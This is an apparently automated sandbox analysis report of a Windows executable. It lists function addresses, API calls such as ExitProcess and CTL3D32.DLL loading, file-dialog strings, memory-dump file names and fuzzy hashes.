Instruction ID: d0195f3de56e3b9c875426cfc1f86f8324729e24b20ef47bd917bfa8e092f6b6
Opcode Fuzzy Hash: 5a0831440ced4d63661c1935b7beef7b2fd5e56c13f236836b5d32444715f561
Instruction Fuzzy Hash: ED61E3B4E012288FEB64CF04DC90BE9B7B6BB85305F1581EAD90D6B351D735AE918F84

Function 004867B7 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00487008

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: d0ae73dec773e27c7ca2f1da00e530def8ac9256fa44d977fe8ee771140b1165
Instruction ID: 0eba04575063ed6cab5cb09e3f3447cfbb87812a716abb4c985bcf17586765d5
Opcode Fuzzy Hash: d0ae73dec773e27c7ca2f1da00e530def8ac9256fa44d977fe8ee771140b1165
Instruction Fuzzy Hash: C24103F2C052249BEB61AA24DC44BFE7B78EB44314F1144FBE84DA6280D23C4EC18F92

Function 00486891 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00487008

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 958cfb765836cc502f4a106a6b2fd57151ed1963c516b0d98fb7bc1fd6e2f0e8
Instruction ID: b0573bd88622221c0f3d841bd414457a6eaa542dc7dfbfa7ba37227da334d59d
Opcode Fuzzy Hash: 958cfb765836cc502f4a106a6b2fd57151ed1963c516b0d98fb7bc1fd6e2f0e8
Instruction Fuzzy Hash: 9911D3F3C14234AAE761AA24DC44AEB7B78AF09310F1144B7E94D67280D23C4E818FD1

Function 00486F32 Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00487008

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 7d411bd4c3566a89752f68e918163a7f49171f31ef33490e3a117efed0779b4c
Instruction ID: e159e064a172c36889b40401dca447597f9d0b19ec4b6f18545c7086db68e4b6
Opcode Fuzzy Hash: 7d411bd4c3566a89752f68e918163a7f49171f31ef33490e3a117efed0779b4c
Instruction Fuzzy Hash: A811D3708051688FEB70DA20DC957FD7B70BB41306F1485EBDA5D56640D6389E828F82

Non-executed Functions

Function 004219EC Relevance: 47.3, APIs: 15, Strings: 12, Instructions: 87
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(00000000,00421CA9,00000000,0042FEB4), ref: 004219FA
SetErrorMode.KERNEL32(00008000,00000000,00421CA9,00000000,0042FEB4), ref: 00421A16
LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,00000000,00421CA9,00000000,0042FEB4), ref: 00421A22
SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,00000000,00421CA9,00000000,0042FEB4), ref: 00421A30
GetProcAddress.KERNEL32(00000000,Ctl3dRegister), ref: 00421A60
GetProcAddress.KERNEL32(00000000,Ctl3dUnregister), ref: 00421A89
GetProcAddress.KERNEL32(00000000,Ctl3dSubclassCtl), ref: 00421A9E
GetProcAddress.KERNEL32(00000000,Ctl3dSubclassDlgEx), ref: 00421AB3
GetProcAddress.KERNEL32(00000000,Ctl3dDlgFramePaint), ref: 00421AC8
GetProcAddress.KERNEL32(00000000,Ctl3dCtlColorEx), ref: 00421ADD
GetProcAddress.KERNEL32(00000000,Ctl3dAutoSubclass), ref: 00421AF2
GetProcAddress.KERNEL32(00000000,Ctl3dUnAutoSubclass), ref: 00421B07
GetProcAddress.KERNEL32(00000000,Ctl3DColorChange), ref: 00421B1C
GetProcAddress.KERNEL32(00000000,BtnWndProc3d), ref: 00421B31
FreeLibrary.KERNEL32(00000000), ref: 00421B43

Strings

Ctl3dCtlColorEx, xrefs: 00421AD2
CTL3D32.DLL, xrefs: 00421A1D
Ctl3dSubclassCtl, xrefs: 00421A93
Ctl3dDlgFramePaint, xrefs: 00421ABD
BtnWndProc3d, xrefs: 00421B26
Ctl3DColorChange, xrefs: 00421B11
Ctl3dSubclassDlgEx, xrefs: 00421AA8
Ctl3dUnregister, xrefs: 00421A7E
,, xrefs: 00421AF7
Ctl3dAutoSubclass, xrefs: 00421AE7
Ctl3dRegister, xrefs: 00421A55
Ctl3dUnAutoSubclass, xrefs: 00421AFC

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister$,
API String ID: 2323315520-653987706
Opcode ID: f677de08b60acc7fb190a4bdd91b9aa6d6becea9de6bd5ce88a285ab58196fb0
Instruction ID: 52a8315a0a1aee7c8134ac1eca8343eb9844bc19ee200515e2c022a95bbd91bc
Opcode Fuzzy Hash: f677de08b60acc7fb190a4bdd91b9aa6d6becea9de6bd5ce88a285ab58196fb0
Instruction Fuzzy Hash: FF31DCB1B01251EEDB10EFE6BE46A553AB4A765718745043BF6009B2E2F77C9C00CB9E

Function 0045CD14 Relevance: 29.5, Strings: 22, Instructions: 2021COMMON

Download Yara Rule

Strings

(*.ci4)|*.ci4, xrefs: 0045CE5C
gBUSE0, xrefs: 0045D046, 0045D4B6, 0045D588, 0045D886, 0045DD63, 0045E207
(*.hex}|*.hex, xrefs: 0045CEE4
.cil, xrefs: 0045D25B
.cl, xrefs: 0045D6AC
%3.3d, xrefs: 0045EBD6
XXXX, xrefs: 0045D279, 0045E0DF
(*.txt) |*.txt, xrefs: 0045CE84
%4.4d, xrefs: 0045DAD0, 0045DDD1, 0045E23E, 0045EC26
(*.cl) |*.cl, xrefs: 0045CEB4
(*.cil)|*.cil, xrefs: 0045CE27
..., xrefs: 0045D0E7
(*.bbd,*.bbf}|*.bbd;*.bbf, xrefs: 0045CF14
9, xrefs: 0045D305
tion, xrefs: 0045CD7B, 0045CD9A, 0045CDA9, 0045CF83, 0045CF9C, 0045D02F, 0045D078, 0045D0AA, 0045D0C4, 0045D119, 0045D14D, 0045D3FA, 0045D41E, 0045D493, 0045D4E2, 0045D571, 0045D5D2, 0045D5F8, 0045D62A, 0045D634, 0045D74C, 0045DB0B, 0045DC19, 0045DE33, 0045DFEE, 0045E6DF, 0045E8EB, 0045E92E, 0045E98C, 0045E9B1, 0045E9D5, 0045EA03, 0045EA1A, 0045EA38, 0045EA50, 0045EA80, 0045EAA6, 0045EAB1, 0045EABD, 0045EACF, 0045EC69, 0045EC88
$, xrefs: 0045DEBF
[CIL], xrefs: 0045E948
N/, xrefs: 0045CF92, 0045EA94
[CI4], xrefs: 0045E96C
.ci4, xrefs: 0045D2C0
ticalSection, xrefs: 0045CD39, 0045D103, 0045D3C1, 0045D3DA, 0045D5BC, 0045DBAF, 0045E008, 0045E01C, 0045E030, 0045E044, 0045E4A4, 0045E520, 0045E59B, 0045E6A9, 0045E6BF, 0045EA75, 0045EAE7, 0045EBB6, 0045EC06, 0045EC49
XXX, xrefs: 0045D26A

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: LoadString
String ID: (*.bbd,*.bbf}|*.bbd;*.bbf$ (*.ci4)|*.ci4$ (*.cil)|*.cil$ (*.cl) |*.cl$ (*.hex}|*.hex$ (*.txt) |*.txt$ [CI4]$ [CIL]$$$%3.3d$%4.4d$...$.ci4$.cil$.cl$9$N/$XXX$XXXX$gBUSE0$ticalSection$tion
API String ID: 2948472770-760668493
Opcode ID: 0aaa02f733dd96804e2d9114c5af8a9494564b3df6d469550d3fd73ea95cd23f
Instruction ID: 606ab79dd2f3589c23be313288a07cce731fc691a40ad59e191ee2829f1c8e09
Opcode Fuzzy Hash: 0aaa02f733dd96804e2d9114c5af8a9494564b3df6d469550d3fd73ea95cd23f
Instruction Fuzzy Hash: 94137034A001089FDB24EF95C885ADDB7F5AF45309F1480B6E904B73A2DB78AE49CF59

Function 00445294 Relevance: 23.0, APIs: 15, Instructions: 461
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: Color
String ID:
API String ID: 2811717613-0
Opcode ID: ed73ed94bb96739597bb6e7252d8330bcc07a601af40cc816d25894d9265c484
Instruction ID: e55aa0489553bf4473b177dc0f7d14c342606d26088bbe9dac0817e28cfe1cdf
Opcode Fuzzy Hash: ed73ed94bb96739597bb6e7252d8330bcc07a601af40cc816d25894d9265c484
Instruction Fuzzy Hash: 2AF11074B501049FDB00EBA9CD86E9EB7F5EF48304F20456AF814EB392CA78ED459B58

Function 004264C0 Relevance: 21.4, APIs: 14, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5aae55a3e7239da411456f42a139b8d7e0ed220ef8fa52f78012c994684afbfa
Instruction ID: 27799b2f40e27b29c67b2c862393c7cc43ec5367c6b3b60650a11815e4c7cbc3
Opcode Fuzzy Hash: 5aae55a3e7239da411456f42a139b8d7e0ed220ef8fa52f78012c994684afbfa
Instruction Fuzzy Hash: 52E17230700124DFCB10DB6DEA85B5EB7F5AF05318FA681AAE405AB352DB38DE41DB19

Function 0044E7A4 Relevance: 20.5, Strings: 15, Instructions: 1735COMMON

Download Yara Rule

Strings

(*.txt) |*.txt, xrefs: 0044E8C2
N, xrefs: 0044F111
[ZST], xrefs: 00450026
(*.bbd,*.bbf}|*.bbd;*.bbf, xrefs: 0044E952
$, xrefs: 0044F82F
(*.zs)|*.zs, xrefs: 0044E8F2
(*.dru)|*.dru, xrefs: 0044E89A
gBUSE0, xrefs: 0044EA84, 0044EE38, 0044EEE2, 0044F1EE, 0044F6CC, 0044FAB3
(*.hex}|*.hex, xrefs: 0044E922
..., xrefs: 0044EB25
%4.4d, xrefs: 0044F432, 0044F73D, 0044FAED, 0045025E
tion, xrefs: 0044E800, 0044E81F, 0044E82E, 0044E9C1, 0044E9DA, 0044EA6D, 0044EAB6, 0044EAE8, 0044EB02, 0044EB57, 0044EB8B, 0044ED7C, 0044EDA0, 0044EE15, 0044EE64, 0044EECB, 0044EF2C, 0044EF52, 0044EF84, 0044EF8E, 0044F0A9, 0044F46D, 0044F57B, 0044F79F, 0044F95E, 0044FDBD, 0044FFC9, 0045000C, 00450046, 0045006B, 0045008F, 004500BD, 004500D4, 004500F2, 0045010A, 0045013E, 00450166, 00450174, 00450180, 00450192, 00450291, 004502B0
9, xrefs: 0044ECA7
ticalSection, xrefs: 0044E7CA, 0044EB41, 0044ED63, 0044EF16, 0044F511, 0044FCE5, 0044FDA7, 00450130, 004501A7, 00450282
.zs, xrefs: 0044F009

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID:
String ID: (*.bbd,*.bbf}|*.bbd;*.bbf$ (*.dru)|*.dru$ (*.hex}|*.hex$ (*.txt) |*.txt$ (*.zs)|*.zs$ N$ [ZST]$$$%4.4d$...$.zs$9$gBUSE0$ticalSection$tion
API String ID: 0-3219324337
Opcode ID: daef4bb6a4fcec4ab52cf95d59058ae3d0423295b4eec75f73393ab8898e0e75
Instruction ID: fa1c3c99e005432d5c3a4bc1a42a7b8610888985b6b2b4b12881d179ec16a032
Opcode Fuzzy Hash: daef4bb6a4fcec4ab52cf95d59058ae3d0423295b4eec75f73393ab8898e0e75
Instruction Fuzzy Hash: 8AF24034A001199FDB10EFA5C985BDDB7F5AF44309F1480B7E404B72A2DB78AE498F59

Function 004251A0 Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00425338
ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00425502), ref: 00425348

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: MessageSendShowWindow
String ID:
API String ID: 1631623395-0
Opcode ID: cd33c39d1bb8561677c4c21b7833a522207fa37869480c9b8b3696b2dcaebdc2
Instruction ID: 2452f5dee069b13f9d375268e16a6d319385b23366733c720c8f6f7ac389319e
Opcode Fuzzy Hash: cd33c39d1bb8561677c4c21b7833a522207fa37869480c9b8b3696b2dcaebdc2
Instruction Fuzzy Hash: D1916F30B04654EFDB00EBA9D996F9E77F4AF08314F5504A6F504AB292C778AE40DB58

Function 0048E468 Relevance: 15.5, Strings: 11, Instructions: 1798COMMON

Download Yara Rule

Strings

AFM, xrefs: 0048F26C
gBUSE0, xrefs: 0048E51B, 0048E5A8
FNT, xrefs: 0048F4B7
CIL, xrefs: 0048FAAA
tion, xrefs: 0048E60D
N/, xrefs: 0048FB4A, 0048FB7F
:00000001FF, xrefs: 0048FF76
LIN, xrefs: 0048F8C8
P, xrefs: 0048EE6B
DRU, xrefs: 0048FD2E
EnterCriticalSection, xrefs: 0048EE81, 0048EEAD, 0048EEC2, 0048EED7, 0048EF5B, 0048EF70, 0048EF85, 0048EF92, 0048F0B6, 0048F0CB, 0048F0E0, 0048F164, 0048F179, 0048F18E, 0048F19B, 0048F27F, 0048F387, 0048F39C, 0048F3B1, 0048F3B6, 0048F4C2, 0048F855, 0048F8D3, 0048FAB5, 0048FD39, 0048FFDA

